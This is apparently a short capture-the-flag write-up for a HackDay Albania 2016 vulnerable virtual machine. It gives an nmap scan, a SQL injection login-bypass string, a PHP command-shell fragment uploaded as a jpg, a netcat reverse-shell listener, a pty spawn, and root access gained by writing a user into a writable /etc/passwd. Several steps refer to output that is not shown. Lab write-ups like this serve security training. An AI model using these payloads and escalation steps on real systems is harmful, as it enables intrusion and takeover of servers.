This was used in HackDay Albania’s 2016 CTF.
The level is beginner to intermediate .
It uses DHCP.
Note: VMware users may have issues with the network interface doing down by default. We recommend (for once!) using Virtualbox.
nmap –sT 10.0.2.9
Nmap version scan:
Checking port 8008 with browser:
Checked all URI’s with a script, they have the same output:
But one is different:
Seems to be Apache 2.4.18:
Checked all url’s from robots.txt with a script if there is a vulnbank directory inside:
Check the directory with a browser:
Test for SQL injection with a quote:
The following SQL injection worked:
admin’ or ‘1’ = 0 #
Now we can upload the reversed shell.
After uploading an jpg image file we’ll find the file location:
So now try some php and call the file shell.jpg:
$cmd = ($_REQUEST[“cmd”]);
Download php-reverse-shell.php from:
Upload the file and access it via the ticket system:
We need to have the netcat listener running on Kali:
nc –vnlp 4444
Spawn the pty shell:
python3 –c ‘import pty; pty.spawn(“/bin/sh”)’
The bank application is running with an mysql database, so there is a config file:
Connect to the mysql database:
Klienti are clients, and they have a password:
Finding all writable files:
find / -writable –type f 2>/dev/null
/etc/passwd appears to be writable for others.
So I could create a password and add a user:
Create the password hash on the Kali box:
Create a file called passwd with the following string:
Create an encrypted string to copy and paste to the target:
echo and decode the string into /etc/passwd
su – rootaccess3: